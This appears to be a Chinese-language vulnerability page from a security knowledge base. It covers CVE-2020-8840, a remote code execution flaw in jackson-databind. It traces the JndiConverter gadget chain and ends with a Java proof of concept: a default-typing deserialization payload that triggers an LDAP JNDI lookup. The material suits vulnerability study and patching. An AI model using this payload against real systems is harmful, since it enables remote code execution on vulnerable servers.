menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 043-FasterXML jackson chevron_right 002-CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞.md
    1.58 KB / 2021-07-17 00:01:26
        # CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞
    
    ### 一、漏洞简介
    
    FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。
    
    此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。
    
    ### 二、漏洞影响
    
    jackson-databind 2.0.0 – 2.9.10.2
    
    经验证fastjson在开启了autoType功能的情况下,影响最新的fastjson v1.2.62版本
    
    ### 三、复现过程
    
    可以在git提交记录中清楚看到利用的具体类
    
    ![](images/15890245585316.png)
    
    
    分析下利用链,通过传进参数asText,触发setter,setAsText()函数
    
    ![](images/15890245668475.png)
    
    
    随后跟进toObject()函数
    
    ![](images/15890245761481.png)
    
    
    最终进到JndiConverter重写的toObjectImp()函数
    
    ![](images/15890245886279.png)
    
    
    此时出现经典的JNDI注入,text 刚好就是我们传进的asText,我们可控,从而达到命令执行目的
    
    ![](images/15890245973710.png)
    
    
    **poc**
    
    
    ```
    import com.fasterxml.jackson.databind.ObjectMapper;
    import java.io.IOException;
    
    public class Poc {
        public static void main(String args[]) {
            ObjectMapper mapper = new ObjectMapper();
    
            mapper.enableDefaultTyping();
    
            String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";
    
            try {
                mapper.readValue(json, Object.class);
            } catch (IOException e) {
                e.printStackTrace();
            }
    
        }
    }
    ```
    
    links
    file_download